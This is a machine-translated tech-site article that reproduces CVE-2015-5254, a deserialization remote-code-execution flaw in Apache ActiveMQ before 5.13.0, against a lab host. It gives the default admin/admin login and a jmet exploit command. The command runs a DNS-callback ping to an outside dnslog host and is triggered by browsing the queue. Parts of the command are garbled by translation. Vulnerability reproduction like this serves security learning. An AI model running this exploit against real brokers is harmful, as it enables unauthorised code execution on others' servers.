In addition to Weibo, there is also WeChat
Please pay attention
WeChat public account
Shulou
2025-09-24 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Network Security >
Share
Shulou(Shulou.com)05/31 Report--
This article is about the ActiveMQ deserialization loophole CVE-2015-5254 reproduction is how, the editor feels very practical, so share with you to learn, I hope you can learn something after reading this article, say no more, follow the editor to have a look.
Apache ActiveMQ is a set of open source message middleware developed by Apache Software Foundation in the United States, which supports Java message service, cluster, Spring Framework and so on. A security vulnerability exists in version 5.x of Apache ActiveMQ prior to 5.13.0, which stems from the fact that the program does not limit the classes that can be serialized in the agent. Remote attackers can exploit this vulnerability to execute arbitrary code via a specially crafted serialized Java message Service (JMS) ObjectMessage object.
The following is only the vulnerability recurrence record and implementation, and the utilization process is as follows:
I. vulnerability environment information
Target link: http://192.168.101.152:8161/
Visit activemq to check whether the deployment is successful
Http://192.168.101.152:8161/admin/ default account password (admin/admin)
Second, vulnerability exploitation
Execute a command
Java-jar jmet-0.1.0-all.jar-Q event-I ActiveMQ-s-Y "ping test.z7wb3x.dnslog.cn"-Yp ROME 192.168.101.152 61616
An event queue is added to the ActiveMQ by accessing the
Http://192.168.101.152:8161/admin/browse.jsp?JMSDestination=event
You can see this queue.
Click and execute the command
Command executed successfully
This is what the CVE-2015-5254 reproduction of ActiveMQ deserialization vulnerabilities looks like. The editor believes that there are some knowledge points that we may see or use in our daily work. I hope you can learn more from this article. For more details, please follow the industry information channel.
Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.
Views: 0
*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.
The market share of Chrome browser on the desktop has exceeded 70%, and users are complaining about
The world's first 2nm mobile chip: Samsung Exynos 2600 is ready for mass production.According to a r
A US federal judge has ruled that Google can keep its Chrome browser, but it will be prohibited from
Continue with the installation of the previous hadoop.First, install zookooper1. Decompress zookoope
About us Contact us Product review car news thenatureplanet
More Form oMedia: AutoTimes. Bestcoffee. SL News. Jarebook. Coffee Hunters. Sundaily. Modezone. NNB. Coffee. Game News. FrontStreet. GGAMEN
© 2024 shulou.com SLNews company. All rights reserved.
12
Report
